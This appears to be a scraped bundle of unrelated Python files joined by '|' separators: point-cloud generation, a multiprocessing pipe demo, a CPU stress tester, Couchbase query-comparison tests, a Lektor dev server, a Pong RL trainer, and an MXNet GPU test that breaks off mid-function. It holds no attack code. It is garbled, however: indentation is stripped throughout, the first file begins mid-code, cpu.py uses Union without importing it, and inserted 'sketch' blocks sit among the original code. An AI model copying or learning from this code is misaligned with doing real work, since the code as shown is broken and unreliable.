# print('gt_path',gt_path)
point_cloud , transforms = perspectiveDepthImageToPointCloud(depth,RGB,seg, gt_path, defaultValue,perspectiveAngle,clip_start,clip_end,resolutionX,resolutionY,resolution_big,pixelOffset_X_KoSyTopLeft,pixelOffset_Y_KoSyTopLeft)
# print(point_cloud)
np.savetxt('./IPARingScrew_part_1/train_pointcloud/%04d_%03d.txt'%(c,d), point_cloud, fmt='%0.6f')
TRAINING_DATA_NUM = 10
MAX_PROCESS = 1
if __name__ == '__main__':
# process_data([0,250])
data_per_process = int(TRAINING_DATA_NUM/MAX_PROCESS)
total_data_range = []
for i in range(MAX_PROCESS - 1):
data_range = [i*data_per_process, (i+1)*data_per_process]
total_data_range.append(data_range)
total_data_range.append([(MAX_PROCESS - 1)*data_per_process, TRAINING_DATA_NUM])
procs = []
for index, data_range in enumerate(total_data_range):
proc = Process(target = process_data, args = (data_range,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
test-multiprocess.py
|
import os
import traceback
import time
import numpy as np
import multiprocessing
class detCalculator(multiprocessing.Process):
def __init__(self, ID, matSize, noChildren, levelsLeft, parent_pipe):
multiprocessing.Process.__init__(self)
self.ID = ID
self.parent_pipe = parent_pipe
self.mat = np.random.uniform(size=(matSize, matSize))
self.children = []
self.pipes = []
print("created node " + self.ID + ":, pid=" + str(os.getpid()))
if levelsLeft:
for chNo in range(noChildren):
chID = self.ID + str(chNo+1)
parent_end, child_end = multiprocessing.Pipe()
                # Instantiate the subclass directly so the child's run() loop executes;
                # wrapping it in Process(target=detCalculator, ...) would only call __init__.
                chP = detCalculator(chID, matSize, noChildren, levelsLeft-1, child_end)
self.children.append( chP )
self.pipes.append( parent_end )
chP.start()
def run(self):
while True:
print("Node " + self.ID + ": " + "running the loop")
try:
msg = self.parent_pipe.recv()
print("Node " + self.ID + ": " + msg)
for ch in self.children:
print("ch:" + ": pid=" + str(ch.pid))
for ch_pipe in self.pipes:
ch_pipe.send(msg)
print("sending message")
except:
print("error")
traceback.print_exc()
break
print("outside of the loop")
return
# def run(self):
# data = []
# while True:
# try:
# msg = self.parent_pipe.recv()
# if msg is None:
# self.kill_children()
# elif msg=="getDet":
# data.append( (self.ID, np.linalg.det(self.mat)) )
# Nremain = len(self.children)
# while Nremain:
# if not self.q.empty():
# q.get()
# Nremain = Nremain - 1
# data.extend(chData)
# for ch_pipe in self.pipes:
# ch_pipe.send(msg)
# self.parent_pipe.send( data )
# except EOFError:
# break
if __name__=='__main__':
matSize = 100
noChildren=2
levels = 1
conn1, conn2 = multiprocessing.Pipe()
newCalc = detCalculator('r', matSize, noChildren, levels, conn2)
newCalc.start()
conn1.send("getDet")
|
cpu.py
|
import os
import sys
import time
from multiprocessing import Process
from threading import Thread
from psutil import cpu_percent
class CPUStress:
"""`Controller <https://git.io/J9cXV>`__ for CPU stress using multiprocessing. Gets duration as user input.
>>> CPUStress
CPU is stressed using `multiprocessing.Process <https://docs.python.org/3/library/multiprocessing.html#
the-process-class>`__ to run the infinite loop on each process.
Args:
seconds:
- The number of seconds for which the CPU has to be stressed. Defaults to five times the number of cores.
Warnings:
- CPU stress is induced in real time.
- A relatively low performing machine may stall when stress is induced for a long duration.
References:
>>> CPUStress._infinite()
Triggers an infinite loop for the number of logical cores.
>>> CPUStress._measure_cpu()
Measures the impact on each logical core in a dedicated thread.
"""
CORES = os.cpu_count()
def __init__(self, seconds: int = CORES * 5):
self.seconds = seconds
self.start_time = None
def _infinite(self) -> None:
"""Infinite loop to stress each core on the CPU for the number of logical cores available.
See Also:
            The loop runs on each core because this function is the target of a ``multiprocessing.Process`` for every logical core.
"""
while True:
try:
for _ in range(self.CORES):
pass
except KeyboardInterrupt:
return
def _measure_cpu(self) -> None:
r"""Uses ``cpu_percent()`` to get the current CPU utilization and print the utilization percentage on each core.
Runs in a forever loop. Stops when the flag ``stop_thread`` is set to ``True``.
"""
# noinspection PyGlobalUndefined
global stop_thread
processors = []
while True:
cpu_util = cpu_percent(interval=1, percpu=True)
processors.append(cpu_util) # stores the list of usage % as a list within a list
output = ''
for index, percent in enumerate(cpu_util):
output += f'Core {index + 1}: {percent}%\t'
sys.stdout.write(f'\r{output.strip()}')
if stop_thread:
break
sys.stdout.flush()
sys.stdout.write('\r')
processors = map(list, zip(*processors))
processors = [max(processor) for processor in processors]
processors = list(enumerate(processors))
processors = sorted(processors, key=lambda x: x[1], reverse=True)
if self.start_time and (run_time := round(time.time() - self.start_time)):
if (stop_when := self.seconds - run_time) and stop_when > 0:
print(f'Actual runtime: {run_time} seconds. Stopped {stop_when} seconds early.')
else:
print('Stress Test was stopped before it began.')
print('CPU Usage Report:')
[print(f'Core {processor + 1} - {self._format_number(usage)}%') for processor, usage in processors]
@classmethod
def _format_number(cls, n: float) -> Union[int, float]:
"""Converts numbers whose float value is .0 to integers.
Args:
n: Raw number, received as a `float`.
Returns:
Union[int, float]:
The integer value if ``n`` has no fractional part, otherwise ``n`` unchanged.
"""
return int(n) if isinstance(n, float) and n.is_integer() else n
def run(self) -> None:
"""Initiator for stress injector.
Methods:
infinite: To kick off stress injector.
measure: To measure the usage in the background running in a dedicated thread.
"""
# noinspection PyGlobalUndefined
global stop_thread
try:
sys.stdout.write(f'\rStressing CPU cores for {self.seconds} seconds')
processes = []
for n in range(self.CORES):
processes.append(Process(target=self._infinite))
stop_thread = False
measure = Thread(target=self._measure_cpu)
measure.start()
time.sleep(1)
self.start_time = time.time()
[each_core.start() for each_core in processes]
time.sleep(self.seconds)
[each_core.terminate() for each_core in processes]
[each_core.join() for each_core in processes]
time.sleep(1)
stop_thread = True
measure.join()
except KeyboardInterrupt:
sys.stdout.write('\rManual interrupt received. Stopping stress.')
stop_thread = True
if __name__ == '__main__':
CPUStress(seconds=60).run()
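# --- Hedged sketch (not part of the original file) ----------------------------
# The module-level stop_thread flag above works, but the same start/stop
# handshake can also be expressed with threading.Event, avoiding the global.
# The names monitor/stop_event below are illustrative only.
import threading
import time

def monitor(stop_event: threading.Event) -> None:
    while not stop_event.is_set():  # loop until the main thread signals stop
        time.sleep(1)               # stand-in for one cpu_percent() sample
        print("sampling...")

if __name__ == "__main__":
    stop_event = threading.Event()
    t = threading.Thread(target=monitor, args=(stop_event,))
    t.start()
    time.sleep(3)      # stand-in for the stress duration
    stop_event.set()   # ask the monitor thread to finish
    t.join()
# ------------------------------------------------------------------------------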
|
new_test_rqg.py
|
from base_test_rqg import BaseRQGTests
from new_rqg_mysql_client import RQGMySQLClientNew
from new_rqg_query_helper import RQGQueryHelperNew
import threading
from rqg_mysql_client import RQGMySQLClient
from rqg_postgres_client import RQGPostgresClient
import traceback
class RQGTestsNew(BaseRQGTests):
''' Subclass of BaseRQGTests whose setUp() defines an additional input parameter: test_name.
The dispatcher function uses this parameter to select the desired transformation logic. '''
def setUp(self):
super(RQGTestsNew, self).setUp()
self.test_name = self.input.param("test_name", "")
self.debug_logging = self.input.param("debug_logging", True)
self.use_new_rqg = self.input.param("use_new_rqg", False)
def tearDown(self):
super(RQGTestsNew, self).tearDown()
def test_rqg(self):
super(RQGTestsNew, self).test_rqg()
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesn't send indexes to Couchbase
query_input_list = []
self.query_helper.debug_logging = self.debug_logging
conversion_func = self.query_helper._get_conversion_func(self.test_name)
conversion_map = {'table_name': str(table_name), "table_map": table_map, 'database_name': self.database}
for n1ql_query in query_template_list:
sql_n1ql_index_map = conversion_func(n1ql_query, conversion_map)
query_input_list.append(sql_n1ql_index_map)
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(query_input_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in query_input_list:
if self.use_new_rqg:
t = threading.Thread(target=self._run_basic_test_new, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
else:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Wait for all test threads to finish, then drop the secondary indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(query_input_list)
else:
count += 1
if count > 1000:
return
def _run_basic_test_new(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
tests_to_run = query_test_map['tests']
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
# run the query
for test in tests_to_run:
if test == "BASIC":
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query)
if self.use_new_rqg:
result_run["run_query_without_index_hint"] = self._run_queries_and_verify_new(n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
else:
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
else:
print("Unknown test type to run")
exit(1)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _run_queries_and_verify_new(self, n1ql_query=None, sql_query=None, expected_result=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
client = RQGMySQLClientNew(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(rows)))
sql_result = self._gen_json_from_results(columns, rows)
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self._verify_results_rqg_new(sql_result=sql_result, n1ql_result=n1ql_result)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
finally:
client._close_connection()
def _gen_json_from_results(self, columns, rows):
data = []
# Convert to JSON and capture in a dictionary
for row in rows:
index = 0
map = {}
for column in columns:
value = row[index]
converted_val = self._convert_to_mysql_json_compatible_val(value, column["type"])
if converted_val is not None:
map[column["column_name"]] = converted_val
index += 1
data.append(map)
return data
def _convert_to_mysql_json_compatible_val(self, value, type):
if value is None:
return None
elif isinstance(value, float):
return round(value, 0)
elif "tiny" in str(type):
if value == 0:
return False
elif value == 1:
return True
else:
return None
elif "int" in str(type):
return value
elif "long" in str(type):
return value
elif "datetime" in str(type):
return str(value)
elif ("float" in str(type)) or ("double" in str(type)):
return round(value, 0)
elif "decimal" in str(type):
if isinstance(value, float):
return round(value, 0)
else:
return int(round(value, 0))
else:
return unicode(value)
def _verify_results_rqg_new(self, n1ql_result=[], sql_result=[]):
new_n1ql_result = []
for result in n1ql_result:
new_n1ql_result.append(result)
n1ql_result = new_n1ql_result
actual_result = n1ql_result
actual_result = sorted(actual_result)
expected_result = sorted(sql_result)
if len(actual_result) != len(expected_result):
extra_msg = self._get_failure_message(expected_result, actual_result)
raise Exception("Results are incorrect. Actual num %s. Expected num: %s. :: %s \n" % (len(actual_result), len(expected_result), extra_msg))
msg = "The number of rows match but the results mismatch, please check"
sorted_actual = self._sort_data(actual_result)
sorted_expected = self._sort_data(expected_result)
combined_results = zip(sorted_expected, sorted_actual)
for item in combined_results:
expected = item[0]
actual = item[1]
for result in expected:
if result not in actual:
extra_msg = self._get_failure_message(expected_result, actual_result)
raise Exception(msg+"\n "+extra_msg)
def _sort_data(self, result):
new_data = []
for data in result:
new_data.append(sorted(data))
return new_data
def _get_failure_message(self, expected_result, actual_result):
if expected_result is None:
expected_result = []
if actual_result is None:
actual_result = []
len_expected_result = len(expected_result)
len_actual_result = len(actual_result)
len_expected_result = min(5, len_expected_result)
len_actual_result = min(5, len_actual_result)
extra_msg = "mismatch in results :: expected :: {0}, actual :: {1} ".format(expected_result[0:len_expected_result], actual_result[0:len_actual_result])
return extra_msg
def _initialize_rqg_query_helper(self):
return RQGQueryHelperNew()
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClientNew(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClientNew(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
if self.test_name and self.test_name == 'window_functions':
hints = []
else:
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params = {}
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
if self.prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception as ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
|
devserver.py
|
import os
import threading
import time
import traceback
from werkzeug.serving import run_simple
from werkzeug.serving import WSGIRequestHandler
from lektor.admin import WebAdmin
from lektor.builder import Builder
from lektor.db import Database
from lektor.reporter import CliReporter
from lektor.utils import portable_popen
from lektor.utils import process_extra_flags
from lektor.watcher import Watcher
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, prune=True, verbosity=0, extra_flags=None):
threading.Thread.__init__(self)
self.env = env
self.output_path = output_path
self.prune = prune
self.verbosity = verbosity
self.last_build = time.time()
self.extra_flags = extra_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(
db.new_pad(), self.output_path, extra_flags=self.extra_flags
)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
if self.prune:
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
with Watcher(self.env, self.output_path) as watcher:
for ts, _, _ in watcher:
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools:
"""This builds the admin frontend (in watch mode)."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
frontend = os.path.join(os.path.dirname(__file__), "..", "frontend")
portable_popen(["npm", "install"], cwd=frontend).wait()
self.watcher = portable_popen(["npm", "run", "dev"], cwd=frontend)
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
# pylint: disable=import-outside-toplevel
import webbrowser
def browse():
time.sleep(1)
webbrowser.open("http://%s:%s" % addr)
t = threading.Thread(target=browse)
t.daemon = True
t.start()
def run_server(
bindaddr,
env,
output_path,
prune=True,
verbosity=0,
lektor_dev=False,
ui_lang="en",
browse=False,
extra_flags=None,
):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get("WERKZEUG_RUN_MAIN") == "true"
in_main_process = not lektor_dev or wz_as_main
extra_flags = process_extra_flags(extra_flags)
if lektor_dev:
env.jinja_env.add_extension("jinja2.ext.debug")
if in_main_process:
background_builder = BackgroundBuilder(
env,
output_path=output_path,
prune=prune,
verbosity=verbosity,
extra_flags=extra_flags,
)
background_builder.daemon = True
background_builder.start()
env.plugin_controller.emit(
"server-spawn", bindaddr=bindaddr, extra_flags=extra_flags
)
app = WebAdmin(
env,
output_path=output_path,
verbosity=verbosity,
debug=lektor_dev,
ui_lang=ui_lang,
extra_flags=extra_flags,
)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(
bindaddr[0],
bindaddr[1],
app,
use_debugger=True,
threaded=True,
use_reloader=lektor_dev,
request_handler=WSGIRequestHandler
if lektor_dev
else SilentWSGIRequestHandler,
)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit("server-stop")
|
__main__.py
|
import logging
import sys
from multiprocessing import Pipe, Process
from operator import itemgetter
from pathlib import Path
import numpy as np
from pong_rl.agents import AgentKerasConv
from pong_rl.environments import PongEnvironment, VectorizedPongEnvironment
from pong_rl.timer import ContextTimer
MODEL_NAME = "convolution_v1"
MODEL_FILE = f"{MODEL_NAME}.h5"
EPISODE_FILE = f"{MODEL_NAME}.episode"
SAVED_MODEL = Path("data", MODEL_FILE)
SAVED_EPISODE = Path("data", EPISODE_FILE)
def get_logger(name, level=logging.INFO):
""" Create logger for main process. """
logger = logging.getLogger(name)
log_format = "[%(asctime)s] %(message)s"
date_format = "%d.%m.%Y %H:%M:%S"
formatter = logging.Formatter(log_format, date_format)
file_handler = logging.FileHandler(Path("log", f"{name}.log"))
file_handler.setFormatter(formatter)
file_handler.setLevel(level)
logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
console_handler.setLevel(level)
logger.addHandler(console_handler)
logger.setLevel(level)
return logger
def renderer(pipe, environment, saved_model, agent_class):
""" Receive actual agent from pipe and render it in provided environment. """
print("[render_process]: Render process started")
agent = agent_class(environment.actions_len, environment.observation_shape)
print("[render_process]: Awaiting for new agent data")
_ = pipe.recv()
print("[render_process]: Received agent update signal")
if saved_model.exists():
agent._model.load_weights(saved_model)
print("[render_process]: Loaded Weights")
else:
print("[render_process]: Model loading failed")
print("[render_process]: Starting episodes rendering")
should_run = True
while should_run:
environment.play_episode(agent, render=True)
if pipe.poll():
episode = pipe.recv()
if saved_model.exists():
agent._model.load_weights(saved_model)
print(f"[render_process]: Received and updated new agent from episode {episode}")
else:
print("[render_process]: Model loading failed")
def main():
np.set_printoptions(precision=4, floatmode="maxprec", edgeitems=16, linewidth=1200)
log = get_logger(MODEL_NAME, logging.INFO)
pong = VectorizedPongEnvironment(num_environments=64)
pong_render = PongEnvironment()
saved_model = SAVED_MODEL
saved_episode = SAVED_EPISODE
agent_class = AgentKerasConv
log.info("Starting rendering process")
child_pipe, parent_pipe = Pipe()
render_process = Process(
target=renderer, args=(child_pipe, pong_render, saved_model, agent_class)
)
render_process.start()
agent = agent_class(pong.actions_len, pong.observation_shape, learning_rate=1e-4)
if saved_model.exists():
log.info("Loading saved model weights")
agent._model.load_weights(saved_model)
else:
log.info(f"Cannot find model data in path: {saved_model.absolute()}")
log.info(f"Agent summary:\n{agent.summary}")
if saved_episode.exists():
episode = int(saved_episode.read_text())
else:
episode = 0
should_train = True
while should_train:
log.info(f"Starting [{episode}] episode")
with ContextTimer("Episode Timer", log):
ep_observations, ep_actions, ep_rewards, ep_score = pong.play_episode(
agent, render=False
)
positive_rewards = ep_rewards >= 0
positive_rewards_num = len(ep_rewards[positive_rewards])
negative_rewards = ep_rewards < 0
negative_rewards_num = len(ep_rewards[negative_rewards])
rewards_ratio = negative_rewards_num / max(positive_rewards_num, 1)  # avoid ZeroDivisionError when there are no positive rewards
log.info(f"Episode [{episode}] rewards len positive: {positive_rewards_num}")
log.info(f"Episode [{episode}] rewards len negative: {negative_rewards_num}")
if positive_rewards_num < negative_rewards_num:
log.info(f"Rebalancing rewards with positive/negative ratio is {rewards_ratio}")
ep_rewards[positive_rewards] *= rewards_ratio
log.info(f"Episode [{episode}] observations number: {len(ep_observations)}")
log.info(f"Episode [{episode}] score: {ep_score.astype(np.int)}")
log.info(f"Episode [{episode}] average score: {np.average(ep_score)}")
log.info(f"Episode [{episode}] max score: {np.max(ep_score)}")
unique_actions, actions_num = np.unique(ep_actions, axis=0, return_counts=True)
unique_actions = [list(a) for a in list(unique_actions.astype(int))]
actions_percent = np.rint(actions_num / np.sum(actions_num) * 100).astype(int)
actions_stats = sorted(zip(unique_actions, actions_num, actions_percent), key=itemgetter(0))
log.info(f"Actions statistics: {actions_stats}")
log.info(f"Rewards:\n {ep_rewards}")
if len(ep_observations) > 0:
with ContextTimer("Training Timer", log):
train_metrics = agent.train(
ep_observations,
ep_actions,
ep_rewards,
batch_size=1024,
)
log.info(f"Episode {episode} train metrics: {train_metrics.history}")
else:
log.info("No training data available, skip training")
log.info("Saving model weights")
agent._model.save_weights(saved_model)
saved_episode.write_text(str(episode))
log.info("Updating rendering agent")
parent_pipe.send(episode)
episode += 1
render_process.join()
if __name__ == "__main__":
main()
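# --- Hedged sketch (not part of the original file) ----------------------------
# Minimal illustration of the non-blocking Pipe polling used by renderer() above:
# the worker keeps doing its job and only picks up an update when the parent has
# sent one. The payload here is just an integer episode number.
from multiprocessing import Pipe, Process
import time

def polling_worker(pipe):
    state = None
    for _ in range(6):        # stand-in for the render loop
        if pipe.poll():       # non-blocking check for an update
            state = pipe.recv()
            print("worker: updated to episode", state)
        time.sleep(0.5)       # stand-in for playing one episode

if __name__ == "__main__":
    parent_end, child_end = Pipe()
    p = Process(target=polling_worker, args=(child_end,))
    p.start()
    for episode in range(3):
        time.sleep(1.0)       # stand-in for one training iteration
        parent_end.send(episode)
    p.join()
# ------------------------------------------------------------------------------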
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import check_sequence_reverse, allclose_function
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_gluon_probability_v1 import *
from test_gluon_probability_v2 import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
del test_custom_op_fork #noqa
set_default_context(mx.gpu(0))
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
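# --- Hedged sketch (not part of the original test file) ------------------------
# Pure-numpy illustration of the count-sketch forward pass verified above: each
# input column idx is multiplied by its sign s[idx] and accumulated into output
# bucket h[idx]. The helper name count_sketch_forward is hypothetical.
def count_sketch_forward(x, h, s, out_dim):
    n, in_dim = x.shape
    out = np.zeros((n, out_dim))
    for idx in range(in_dim):
        out[:, h[idx]] += x[:, idx] * s[idx]  # signed accumulation into the hashed bucket
    return out
# Tiny worked example: 1 sample, 4 inputs hashed into 2 buckets.
#   x = [[1, 2, 3, 4]], h = [0, 1, 0, 1], s = [1, -1, 1, -1]
#   bucket 0 gets 1*1 + 3*1 = 4, bucket 1 gets 2*(-1) + 4*(-1) = -6  ->  [[4., -6.]]
# ------------------------------------------------------------------------------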
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
